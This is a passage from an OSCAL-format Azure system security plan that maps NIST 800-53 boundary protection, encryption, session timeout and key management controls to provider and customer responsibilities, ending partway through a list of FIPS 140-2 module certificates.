statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fee2e2fe-90b6-403b-b8a7-0e1dae84f9cd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.21","statements":[{"uuid":"a0927b8b-68bc-4945-80d4-075563492c50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.21_smt","by-components":[{"uuid":"2e4df7cd-8f32-414f-8b71-22f8ae6d191c","export":{"provided":[{"uuid":"26c0d304-e3f7-4778-9e2c-c3594394fdc8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-031"}],"description":"Azure service teams are segregated from each other using Azure-managed boundary protection devices for bare metal hardware or logical isolation mechanisms for virtual machines, including VLAN and Network Security Group (NSG) and Virtual Network (VNet) segmentation, ACL restrictions, and encrypted communications. Azure also implements logical separation for its separate cloud environments in addition to all boundary protection mechanisms described above. _x000D_ _x000D_"}],"responsibilities":[{"uuid":"2eca0659-030b-4c2a-ad6a-602febeefd0e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-031"}],"description":"The customer is responsible for employing boundary protection mechanisms to separate customer-defined resources supporting organizational missions and/or business functions.","provided-uuid":"26c0d304-e3f7-4778-9e2c-c3594394fdc8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"df7291b8-cffe-4b30-9ebf-e879c68aa3dd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-8","statements":[{"uuid":"2d142d04-79a5-49b2-8f54-c2a0e777d5dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-8_smt","by-components":[{"uuid":"081bce7d-dc96-458c-ba1a-193031b92a4b","export":{"provided":[{"uuid":"1c49842f-3b01-499a-b04d-4fd81ef0f607","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-032"}],"description":"Azure services always use secure transport such as TLS or HTTPS. Encryption in transport is addressed by the transport protocol. Azure implements the transmission integrity and confidentiality control by ensuring that cryptography is implemented through a hybrid model. The following is a high-level list of the symmetric and asymmetric keys used for encrypting and protecting confidentiality of data._x000D_ _x000D_ * AES for symmetric encryption/decryption_x000D_ * 128-bit or better symmetric keys_x000D_ * RSA for asymmetric encryption/decryption and signatures_x000D_ * 2048-bit or better RSA keys_x000D_ * SHA-256 or better (SHA-384, SHA-512) for hashing and message-authentication codes_x000D_ _x000D_ Azure implements cryptography in numerous ways. Communications between the Azure service and the Azure Management Portal are configured to accept FIPS 140-2 validated encryption. Azure enforces communications between Azure internal components to be protected with self-signed SSL certificates. Hardware Security Modules used by Azure Key Vault employ FIPS 140-2 validated encryption. Azure requires that data is classified according to sensitivity (LBI, MBI, or HBI), and the owner of the data is responsible for following the Asset Classification Standard and Asset Protection Standard for encrypting data according to its classification._x000D_ _x000D_ Secrets are communicated through the Azure Management Portal and API over a secure TLS 1.2 channel. Both the SMAPI and the Azure Management Portal are only accessible over HTTPS. Service certificates, RDP passwords, and Storage Account Keys (SAKs) are stored in an encrypted format._x000D_ _x000D_ Azure utilizes FIPS 140-2 Cryptographic Module Verification Program (CMVP) validated modules for areas requiring encryption. HMAC is keyed hash function for message authentication (RFC 2104). It makes use of an underlying hash function (MD5, SHA-1 or SHA-2) and a secret key of a specified length. The strength of an HMAC relies on the strength of the underlying hash function, and the length of the secret._x000D_ _x000D_ * A SHA-2 hash is required for new code._x000D_ * SHA-1 is permissible in existing code only for backwards compatibility and after review by the Crypto Board._x000D_ * MAC3DES is permissible for managed code only since this is the only FIPS-compliant keyed hash algorithm for .NET currently available. A Crypto Board review is required for such usage._x000D_ * Other hash functions, including MD2, MD4 or MD5 are not permitted, and must be replaced in existing code._x000D_ _x000D_ All approved keyed hash algorithms are members of the HMAC family. HMAC is a mechanism for constructing a keyed hash algorithm using an underlying hash algorithm. For projects utilizing keyed hash algorithms, the following hash functions must be used within the HMAC mechanism._x000D_ _x000D_ Note that hash function agility (the ability to switch to another hash function without patching the code) is part of the \"Implement Crypto Agility\" requirement. No new code should use the MD4 or MD5 hash algorithms as hash collisions have been demonstrated for both algorithms. SHA1 is being deprecated. Continued use of SHA-1 is permissible in existing code only for backwards compatibility and, as described below, for new code running on certain down-level platforms. A SHA-2 hash is currently the only recommended hash function. The SHA-2 hash functions are available in managed code, and in unmanaged code targeting Windows Server 2003 SP1 and later versions of Windows._x000D_ _x000D_ For new managed code, use of a SHA-2 hash function is required. SHA-1 is permissible in existing code only for backwards compatibility. Such usage requires Crypto Board review. All other hash functions, including MD2, MD4 or MD5 must not be used, and must be replaced in existing code. For unmanaged code, use of a SHA-2 hash function is required._x000D_ _x000D_ In order to access the Azure environment via network connection, a user must authenticate with their Azure domain credentials. Azure provides access through smart-card-enabled Jumpboxesand SSL VPN servers when establishing access connections into the Azure environments. Users must have a valid smart card, and valid Azure domain accounts to establish a remote access session. Jumpboxesand SSL VPN servers are configured to use the FIPS 140-2 encryption setting, specifically TLS 1.2._x000D_ _x000D_ The use of FIPS 140-2 validated cryptography is used by Azure to support compliance with federal laws, executive orders, directives, policies, regulations, standards, and guidance. FIPS 140-2 encryption is required for digital media physically transported, electronically transmitted over Azure via TLS, and for authentication for Windows-based authentication and SSH authentication to network devices._x000D_ _x000D_ Encrypted data may transit across the Azure environment, but the network devices are agnostic as to the type of data being transmitted. Azure relies on extensive physical security to protect all the end to end communications inside datacenters._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9862f9bd-d919-44e7-ad73-cbe9674f8e0a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-032"}],"description":"The customer is responsible for configuring all customer-deployed resources to communicate through FIPS 140-2 validated encryption to protect the confidentiality and integrity of the information being transmitted. Customers are responsible for configuring their web browsers, mobile devices, etc., to enable communications through FIPS 140-2 validated encryption. Customers who enforce FDCC/USGCB settings will achieve FIPS 140-2 encryption for data transmitted to Microsoft Azure, and between their enablers and the Azure web services interface; strong encryption with FIPS-approved ciphers is still possible if workstations are not operating in FIPS mode.","provided-uuid":"1c49842f-3b01-499a-b04d-4fd81ef0f607"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"44568f58-4c2e-4f19-9fd1-ce42ae8e156c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-8.1","statements":[{"uuid":"dabeb3cd-5aa6-4646-92eb-70ee447b9dfb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-8.1_smt","by-components":[{"uuid":"a07fa792-d1f0-47b9-a8bd-b7ae478c256d","export":{"provided":[{"uuid":"cde8e3f0-50aa-4e68-b2d6-55b7013b4327","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-033"}],"description":"Azure uses encryption to prevent unauthorized disclosure of information and detect changes to information during transmission. Specifically, Azure provides FIPS 140-2 compliant ciphers that include integrity validation for customer connections, interconnected system connections, and remote access connections._x000D_ _x000D_ For connections to customers, Azure is configured to negotiate FIPS compliant TLS protocols with supported client browsers, though non-FIPS compliant protocols are supported for legacy browser support._x000D_ _x000D_ Connections within the accreditation boundary occur within Azure facilities. Since Azure owns and controls access to these connections, they do not require FIPS 140-2 encryption. However, service-to-service communications occur over TLS 1.2, and internal communication between Azure datacenters is transmitted over FIPS 140-2 compliant AES 256 link encryptors to the ensure confidentiality of data._x000D_ _x000D_"}],"responsibilities":[{"uuid":"da323327-14cb-41e6-bc46-f61ea60b2abb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-033"}],"description":"The customer is responsible for protecting information in transit by using cryptographic mechanisms to prevent the unauthorized disclosure of and/or detecting changes to customer-controlled information during transmission.","provided-uuid":"cde8e3f0-50aa-4e68-b2d6-55b7013b4327"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"90b4622a-e030-429b-8f4f-9be059d016e9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-10","statements":[{"uuid":"ef862fb2-1f0b-4dc4-90d8-c859787fc33c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-10_smt","by-components":[{"uuid":"238f037e-7bee-44eb-b3dc-7673de0e81a5","export":{"provided":[{"uuid":"f44d00f2-d1a8-4f17-9bfd-ef8d5e77e16c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-034"}],"description":"Azure Secure Admin Workstations (SAWs) require reauthentication after at most ten (10) minutes of user inactivity. These are the only method of access to the environment. The SAW VPN terminates inactive sessions after three hundred sixty (360) minutes of inactivity, and the non-SAW VPN terminates inactive sessions after sixty (60) minutes of inactivity._x000D_ _x000D_ The logical access process to Azure resources is controlled using Remote Desktop Protocol (RDP), Secure Shell (SSH) and the SSL VPN. Non-interactive sessions are not permitted through Azure._x000D_ _x000D_ Servers_x000D_ _x000D_ RDP and SSH idle timeout inherit the settings of the target server. Azure servers are configured to terminate idle sessions after one (1) hour of inactivity & one (1) day to end a disconnected session for RDP and (15) minutes of inactivity for SSH._x000D_ _x000D_ Network Devices_x000D_ _x000D_ SSH idle timeout inherits the settings of the target network device. Azure network devices are configured to terminate inactive sessions after sixty (60) minutes._x000D_ _x000D_ Azure implements user sessions that terminate after sixty (60) minutes of inactivity on the Pulse VPN. The risks associated with a sixty (60) minute disconnect are mitigated through using multifactor authentication (MFA) with FIPS 140-2 level 3 validated smart card tokens for all in-band management and by logging security events related to account activity._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7d1c63a1-dfe6-4096-9cdb-3b5067c5b8b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-034"}],"description":"The customer is responsible for implementing a network disconnect for customer-deployed resources at the end of a communication session or after a customer-defined time period of inactivity.","provided-uuid":"f44d00f2-d1a8-4f17-9bfd-ef8d5e77e16c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c3a72bf4-d415-463b-a52a-1adc223fbbc0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-12","statements":[{"uuid":"a2077075-7f56-420f-9e63-a90e75bcbdf9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-12_smt","by-components":[{"uuid":"59feb47f-8d68-4cd4-a9ae-aa98a5c0cb04","export":{"provided":[{"uuid":"7f06a7f2-00cd-4f62-a79e-afadf5d4c085","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-035"}],"description":"When cryptographic capabilities are employed to protect the confidentiality, integrity, or availability of data within Azure, the algorithms and cryptographic modules are FIPS 140-2 compliant. Rather than validate individual services, components, or products, Microsoft chooses to validate only the underlying cryptographic modules. Subsequently, Azure services are built to rely on the FIPS 140 validated cryptographic modules of the underlying operating systems, including the Cryptographic API: Next Generation (CNG) and Cryptographic API (CAPI) for Windows and Kernel Crypto API for Linux. Azure uses the documented APIs for each of the modules to access various cryptographic services. For additional information on how cryptographic modules are employed in Microsoft products, see the links below:_x000D_ _x000D_ <https://docs.microsoft.com/en-us/windows/security/threat-protection/fips-140-validation>_x000D_ <https://docs.microsoft.com/en-us/microsoft-365/compliance/offering-fips-140-2>_x000D_ _x000D_ When utilizing cryptographic mechanisms for securing data or services, Azure adheres to Microsoft's Key Management Standard for establishing and managing keys. The Key Management Standard applies to all environments managed by Azure, including labs, production, and preproduction. Equipment used to generate, store and archive keys is physically and logically protected. Keys are classified and destroyed in accordance with the requirements set forth in the Asset Classification Standard and Asset Protection Standard documents. To reduce the likelihood of compromise, activation and deactivation dates for keys are defined so that the keys can only be used for a limited period. The Key Management Standard mandates the following Key Management Procedures:_x000D_ _x000D_ * Standard Operating Procedures_x000D_ * Secure methods_x000D_ * Storing Keys_x000D_ * Distributing Keys_x000D_ * Archiving Keys_x000D_ * Key Destruction_x000D_ * Changing or Updating Keys_x000D_ * Compromised Keys_x000D_ * Recovering Keys_x000D_ * Revoking Keys_x000D_ * Logging and Auditing_x000D_ * Key Distribution and access control_x000D_ _x000D_ Azure implements cryptographic key management through the use of approved secret stores, including Azure Key Vault and dSMS. Azure ensures that both secret stores contain the approved trust anchors, including certificates with visibility external to Azure and certificates related to the internal operations of services._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c936a2c5-e37d-4bd2-b478-b3759abb36b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-035"}],"description":"The customer is responsible for managing cryptographic keys used within customer-deployed resources in accordance with customer-defined requirements for key generation, distribution, storage, access, and destruction. Government user entities will ensure that personal computing devices (client systems) are configured to request FIPS 140-2 encryption ciphers and protocols for all network sessions.","provided-uuid":"7f06a7f2-00cd-4f62-a79e-afadf5d4c085"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f67c9a46-62f2-4eb8-85f4-2178d88144b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-12.1","statements":[{"uuid":"8bc4c436-2e06-4985-b400-4f5bb98239f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-12.1_smt","by-components":[{"uuid":"bf0e849a-bc76-4b8e-875b-fec8f1217fdc","export":{"provided":[{"uuid":"a8a12fd1-4efa-4c74-bc86-ec69a0b3bf8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-036"}],"description":"Azure service teams store their Storage Account Keys within an approved secret management store, which tracks and monitors access to secrets. The approved secret management stores, Key Vault and dSMS, are backed up regularly and provide the ability to restore data that has been accidentally deleted. This ensures that the Storage Account Key is never lost. Azure Storage also has a soft delete option, which preserves a key if accidentally or maliciously deleted._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7d08f938-d69e-4f74-8eb9-eb8f8c3dd1eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-036"}],"description":"The customer is responsible for maintaining the availability of information in the event of the loss of cryptographic keys by users. Customers store cryptographic keys using Key Vault, which provides the ability to restore data that has accidentally been deleted.","provided-uuid":"a8a12fd1-4efa-4c74-bc86-ec69a0b3bf8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"eb3adcd0-29f9-42bc-a717-c0d3f36c3ee5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-13","statements":[{"uuid":"1cc5a1a9-aae4-4379-b971-141d05a1264f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-13_smt.a","by-components":[{"uuid":"33ee2ff4-9d36-48e9-8764-59bf83553744","export":{"provided":[{"uuid":"74747e58-54fe-48c4-b346-d16028c7a636","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-037"}],"description":"Azure uses cryptography for the protection of controlled unclassified information, provision and implementation of digital signatures, logical network separation, and random number and hash generation."}],"responsibilities":[{"uuid":"a25483c9-8165-4e2c-90ce-174948c5651b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-037"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining organization-defined cryptographic uses.","provided-uuid":"74747e58-54fe-48c4-b346-d16028c7a636"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d49385ae-4a35-4d02-b59f-e09542e58845","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-038"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-13_smt.b","by-components":[{"uuid":"e1685615-45f0-4e07-b1ec-b72ff04f230d","export":{"provided":[{"uuid":"85eaccaa-72bc-4d9f-bbd4-6b36fba345cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-038"}],"description":"Encryption mechanisms and techniques used within Azure follow the requirements and restrictions outlined in the Microsoft Key Management Standard, Microsoft Operational Encryption Standard, Azure Cryptographic Controls Standard Operating Procedure. The Microsoft Key Management Standard applies to the operation of all Microsoft's online services residing within Azure utilizing cryptographic mechanisms for securing data or services. This standard applies to all environments managed by Azure, including labs, production, and pre-production. Azure implements cryptography through encryption mechanisms and techniques following the requirements outlined in the Cryptographic Controls of the Microsoft Security Program Policy (MSPP). Federal Information Processing Standards (FIPS) 140-2 validated cryptographic modules are used to support compliance with federal laws, executive orders, directives, policies, regulations, and standards. Additional information can be found at the link below: <https://docs.microsoft.com/en-us/windows/security/threat-protection/fips-140-validation> Specific encryption modules being used and the certificates for the server baselines can be found at <https://csrc.nist.gov/groups/STM/cmvp/documents/140-1/1401vend.htm> and are identified below, using the Certificate Number and Module Name. Servers Azure leverages the cryptographic capabilities that are directly a part of the Windows and Linux operating systems for certificates and authentication mechanisms such as Kerberos v5. These cryptographic modules have been certified by NIST as being Federal Information Processing Standards (FIPS) 140-2 compliant. * 3651 - Secure Kernel Code Integrity * 3644 - Code Integrity * 3615 - Windows OS Loader * 3527 - Kernel Mode Cryptographic Primitives Library * 3513 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3510 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3502 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3501 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3487 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 3480 - Windows OS Loader * 3197 - Cryptographic Primitives Library * 3196 - Kernel Mode Cryptographic Primitives Library * 3195 - Code Integrity * 3194 - Windows OS Loader * 3096 - Secure Kernel Code Integrity * 3095 - Cryptographic Primitives Library * 3094 - Kernel Mode Cryptographic Primitives Library * 3093 - Code Integrity * 3092 - BitLocker Dump Filter * 3091 - Windows Resume * 3090 - Windows OS Loader * 3089 - Boot Manager * 2938 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 2937 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2936 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2935 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2934 - BitLocker® Dump Filter (dumpfve.sys) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2933 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 * 2932 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2931 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016, Azure Host OS (version 1.65) * 2357 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2356 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2355 - Code Integrity (ci.dll) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2354 - BitLocker® Dump Filter (dumpfve.sys) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro,Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series * 2353 - BitLocker® Windows Resume (winresume) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series * 2352 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 2351 - Boot Manager in Microsoft Windows 8.1 Enterprise, Windows Server 2012 R2, Windows Storage Server 2012 R2, Surface Pro 3, Surface Pro 2, Surface Pro, Surface 2, Surface, Windows RT 8.1, Windows Phone 8.1, Windows Embedded 8.1 Industry Enterprise, StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2 * 3651 - Secure Kernel Code Integrity * 3644 - Code Integrity * 3615 - Windows OS Loader * 3197 - Cryptographic Primitives Library * 3196 - Kernel Mode Cryptographic Primitives Library * 3092 - BitLocker Dump Filter * 3089 - Boot Manager The Linux servers employ NIST-certified Federal Information Processing Standards (FIPS) 140-2 compliant cryptographic modules. * 3647 - Ubuntu 18.04 Kernel Crypto API Cryptographic Module * 3622 - Ubuntu 18.04 OpenSSL Cryptographic Module * 3633 - Ubuntu 18.04 OpenSSH Client Cryptographic Module * 3632 - Ubuntu 18.04 OpenSSH Server Cryptographic Module * 3648 - Ubuntu 18.04 Strongswan Cryptographic Module * 3683 - Ubuntu 18.04 Azure Kernel Crypto API Cryptographic Module * 2962 - Ubuntu Kernel Crypto API Cryptographic Module * 2888 - Ubuntu OpenSSL Cryptographic Module * 2907 - Ubuntu OpenSSH Client Cryptographic Module * 2906 - Ubuntu OpenSSH Server Cryptographic Module * 2978 - Ubuntu Strongswan Cryptographic Module * 4277 - CBL-Mariner 1.0 Kernel Crypto API * 4496 - CBL-Mariner 2.0 OpenSSL Cryptographic Module * 4292 - Ubuntu 20.04 OpenSSL Cryptographic Module * 4126 - Ubuntu 20.04 Azure Kernel Crypto API Cryptographic Module * 4046 - Ubuntu 20.04 Strongswan Cryptographic Module * 3966 - Ubuntu 20.04 OpenSSL Cryptographic Module * 3928 - Ubuntu 20.04 Kernel Crypto API Cryptographic Module\" * 3902 - Ubuntu 20.04 Libgcrypt Cryptographic Module * 3939 - Red Hat Enterprise Linux 7 Kernel Crypto API Cryptographic Module\" * 3725 - Ubuntu 16.04 OpenSSL Cryptographic Module\" * 3724 - Ubuntu 16.04 Kernel Crypto API Cryptographic Module * 3980 - Ubuntu 18.04 OpenSSL Cryptographic Module * 3876 - Red Hat Enterprise Linux 7 OpenSSL Cryptographic Module\" * 3538 - Red Hat Enterprise Linux OpenSSL Cryptographic Module\" * 3016 - Red Hat Enterprise Linux OpenSSL Cryptographic Module\" * 4642 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 4458 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 4438 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 4434 - Red Hat Enterprise Linux 8 Kernel Crypto API Cryptographic Module * 4428 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 4413 - Red Hat Enterprise Linux 8 NSS Cryptographic Module * 4397- Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 4384 - Red Hat Enterprise Linux 8 libgcrypt Cryptographic Module * 4272 - Red Hat Enterprise Linux 8 GnuTLS Cryptographic Module * 4271 - Red Hat Enterprise Linux 8 OpenSSL Cryptographic Module * 4254 - Red Hat Enterprise Linux 8 